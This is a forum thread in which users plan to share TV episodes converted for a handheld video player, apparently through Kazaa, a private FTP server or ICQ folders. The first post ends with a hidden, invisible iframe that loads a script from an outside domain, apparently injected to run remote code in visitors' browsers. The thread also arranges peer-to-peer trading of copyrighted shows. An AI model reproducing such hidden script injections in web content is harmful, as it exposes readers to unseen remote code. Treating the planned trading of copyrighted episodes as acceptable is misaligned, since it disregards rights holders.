+ Reply to Thread

Thread: Phone Videos

Phone Videos

Now that I'm starting to build up a little library of Teal pdb videos I'm wondering if there's an easy way to share them. Apparently this message board doesn't want to be the repository for things like Seinfeld and Simpsons videos, and I don't blame them. E-mailing isn't a practical option either since Yahoo won't let me send anything over 1.5 megs. If there are any Kazaa users here I could put them in "My Shared Folder" and maybe they'd show up on Kazaa? What do you think?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

So do you have full episodes that are working??? Sweet! I was just thinking about this last night. Maybe we could set up a closed trading group on a peer-to-peer program, rather than just having them open to the whole world. Should make it more manageable. Where are people getting the full size files from to do the conversions? All I have is stuff in video tape.
    ---------------
    The same thing we do every night, Pinky...

Kazaa has Seinfeld, South Park, and Simpsons. The problem is that many of them are Divx, which Teal chokes on, and often you can't tell until after the download.

I agree. We need someone's personal webpage or something where we can upload and download them. I am VERY interested in joining in on this. I also can vouch for Robert K. & Steve.
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    I agree. We need someone's personal webpage or something where we can upload and download them. I am VERY interested in joining in on this. I also can vouch for Robert K. & Steve.
    Markito is correct. I'm In.

what we need is someone with a private ftp server. I was thinking of setting something up when i get a new computer, but I don't plan on doing that for at least 6 months.
    iPhone therefore iAm.

how about your Icq shared files folder?
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16